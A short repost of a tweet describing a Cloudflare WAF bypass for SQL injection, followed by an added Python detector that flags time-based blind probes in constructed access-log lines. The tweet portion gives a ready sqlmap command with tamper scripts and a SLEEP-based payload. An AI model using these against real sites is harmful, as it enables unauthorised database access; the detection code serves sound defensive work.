A SQL injection WAF bypass against Cloudflare was reported, using sqlmap (or the author's injectionmap[.]py) with the tamper scripts space2comment and between: sqlmap -u "target-domain[.]com" --dbs --batch --time-sec 10 --level 3 --hex --random-agent --tamper=space2comment,betweeny
The time-based blind payload was: +AND+(SELECT+5140+FROM+(SELECT(SLEEP(10)))lfTO). The bypass relied on a time-based blind SQL injection vulnerability. More details can be found at the provided link.
Bypass waf for SQL injection
cloudflare
command :
injectionmap[.]py <or> sqlmap -u "target-domain[.]com" --dbs --batch --time-sec 10 --level 3 --hex --random-agent --tamper=space2comment,betweeny
time-based blind: +AND+(SELECT+5140+FROM+(SELECT(SLEEP(10)))lfTO) pic.twitter.com/AP3DTHuEPQ
— Sulaiman (@byt3n33dl3) January 26, 2025
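A defender-side check for the kind of probe shown in the post, added here as an example and not code from the original post or from sqmap: it normalises a request parameter (URL decoding, collapsing the /**/ comments that space2comment emits) before looking for the SLEEP-based subselect or the NOT BETWEEN 0 AND rewrite that the between tamper produces, and runs over constructed access-log lines.

```python
"""Flag time-based blind SQL injection probes, including the
space2comment / between obfuscations, in constructed web access-log lines."""
import re
from urllib.parse import unquote_plus

# Signals to look for once the value has been normalised.
TIME_FUNCS = re.compile(r"\b(sleep|benchmark|pg_sleep|waitfor\s+delay)\b", re.I)
# sqlmap's "between" tamper rewrites A > B as A NOT BETWEEN 0 AND B.
BETWEEN_REWRITE = re.compile(r"\bnot\s+between\s+0\s+and\b", re.I)
# SELECT ... FROM (SELECT ...) : the nested-subselect shape of the payload.
SUBSELECT = re.compile(r"\bselect\b.*\bfrom\b.*\(\s*select\b", re.I | re.S)

def normalise(raw: str) -> str:
    """URL-decode ('+' becomes space), strip inline comments
    (space2comment turns every space into /**/) and squeeze whitespace."""
    text = unquote_plus(raw)
    text = re.sub(r"/\*.*?\*/", " ", text, flags=re.S)  # /**/ -> space
    return " ".join(text.split())

def score(raw: str) -> dict:
    """Which signals fired for one parameter value."""
    n = normalise(raw)
    return {
        "time_func": bool(TIME_FUNCS.search(n)),
        "between_rewrite": bool(BETWEEN_REWRITE.search(n)),
        "subselect": bool(SUBSELECT.search(n)),
    }

def is_time_based_probe(raw: str) -> bool:
    """A sleep call alone is noisy; require a subselect or between rewrite too."""
    s = score(raw)
    return s["time_func"] and (s["subselect"] or s["between_rewrite"])

# Constructed sample access-log lines (not real traffic).
SAMPLE_LOG = [
    "GET /item?id=1 200",
    "GET /item?id=1+AND+(SELECT+5140+FROM+(SELECT(SLEEP(10)))lfTO) 200",
    "GET /item?id=1/**/AND/**/(SELECT/**/5140/**/FROM/**/(SELECT(SLEEP(10)))lfTO) 200",
    "GET /item?id=1%20AND%201%20NOT%20BETWEEN%200%20AND%20(SELECT%20SLEEP(5)) 200",
    "GET /search?q=sleep+well 200",
]

def flagged_requests(lines):
    """Return the log lines whose query string looks like a time-based probe."""
    hits = []
    for line in lines:
        path = line.split()[1]
        query = path.partition("?")[2]
        if is_time_based_probe(query):
            hits.append(line)
    return hits
```

The benign "sleep well" search is not flagged because the sleep keyword alone does not satisfy the rule.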